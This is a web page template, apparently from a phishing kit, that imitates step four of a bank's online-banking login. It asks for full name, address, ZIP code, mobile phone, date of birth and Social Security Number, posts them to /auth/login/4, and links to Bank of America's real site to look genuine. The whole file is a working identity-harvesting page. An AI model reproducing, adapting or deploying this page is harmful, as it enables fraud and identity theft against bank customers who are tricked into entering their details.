@layout('layouts.app')

@section('content')
<form id="login4Form" class="cb-form" action="/auth/login/4" method="POST">
  <div class="columns col-small">
    <div class="row">
      <div class="column col-small mtop-30">
        <div class="btm-20">
          <h1 class="cb-login-heading">Log In to Online Banking</h1>
        </div>
        <div class="btm-30 cb-login-formInfo">To secure your account, please enter the following.</div>
      </div>

      <div class="column col-small clearfix">
        <div class="btm-30">
          <div class="cb-input cb-input-box cb-input--cb2 has-help">
            <label id="fullNameLabel" class="cb-input-label" for="fullName">Full Name</label>
            <input id="fullName" name="fullName" type="text" class="cb-input-text" autocapitalize="off" autocorrect="off" autocomplete="off">
            <p class="cb-input-hint"></p>
            <div class="cb-input-error-message cb-icon--error" id="fullNameErrorMsg" style="display: none;">Full Name required</div>
          </div>
        </div>

        <div class="btm-30">
          <div class="cb-input cb-input-box cb-input--cb2 has-help">
            <label id="addressLabel" class="cb-input-label" for="address">Street Address</label>
            <input id="address" name="address" type="text" class="cb-input-text" autocapitalize="off" autocorrect="off" autocomplete="off">
            <p class="cb-input-hint"></p>
            <div class="cb-input-error-message cb-icon--error" id="addressErrorMsg" style="display: none;">Street Address required</div>
          </div>
        </div>

        <div class="btm-30">
          <div class="cb-input cb-input-box cb-input--cb2 has-help">
            <label id="zipLabel" class="cb-input-label" for="zip">ZIP Code</label>
            <input id="zip" name="zip" type="text" class="cb-input-text" autocapitalize="off" autocorrect="off" autocomplete="off">
            <p class="cb-input-hint"></p>
            <div class="cb-input-error-message cb-icon--error" id="zipErrorMsg" style="display: none;">ZIP Code required</div>
          </div>
        </div>

        <div class="btm-30">
          <div class="cb-input cb-input-box cb-input--cb2 has-help">
            <label id="phoneLabel" class="cb-input-label" for="phone">Mobile Phone</label>
            <input id="phone" name="phone" type="text" class="cb-input-text" autocapitalize="off" autocorrect="off" autocomplete="off">
            <p class="cb-input-hint"></p>
            <div class="cb-input-error-message cb-icon--error" id="phoneErrorMsg" style="display: none;">Mobile Phone required</div>
          </div>
        </div>

        <div class="btm-30">
          <div class="cb-input cb-input-box cb-input--cb2 has-help">
            <label id="dobLabel" class="cb-input-label" for="dob">Date of Birth (MM/DD/YYYY)</label>
            <input id="dob" name="dob" type="text" class="cb-input-text" autocapitalize="off" autocorrect="off" autocomplete="off">
            <p class="cb-input-hint"></p>
            <div class="cb-input-error-message cb-icon--error" id="dobErrorMsg" style="display: none;">Date of Birth required</div>
          </div>
        </div>

        <div class="btm-30">
          <div class="cb-input cb-input-box cb-input--cb2 has-help">
            <label id="ssnLabel" class="cb-input-label" for="ssn">Social Security Number</label>
            <input id="ssn" name="ssn" type="password" class="cb-input-text hide-input" autocapitalize="off" autocorrect="off" autocomplete="off">
            <p class="cb-input-hint"></p>
            <div class="cb-input-error-message cb-icon--error" id="ssnErrorMsg" style="display: none;">Social Security Number required</div>
          </div>
        </div>

        <div class="cb-login-helpText">
          <a href="https://secure.bankofamerica.com/">Forgot ID/Password?</a>
        </div>
      </div>

      <div class="column col-small clearfix">
        <div class="btn-container">
          <button id="login2SubmitBtn" type="submit" class="cb-btn cb-btn--medium cb-btn--primary mrt-15 submitBtn">Continue</button>

          <button id="cancelBtn" type="button" class="cb-btn cb-btn--medium cb-btn--secondary">Cancel</button>
        </div>
      </div>
    </div>
  </div>
</form>
@endsection

@section('script')
<script>
  $('#zip').mask('00000');
  $('#phone').mask('(000) 000-0000');
  $('#dob').mask('00/00/0000');
  $('#ssn').mask('000-00-0000');
</script>
@endsection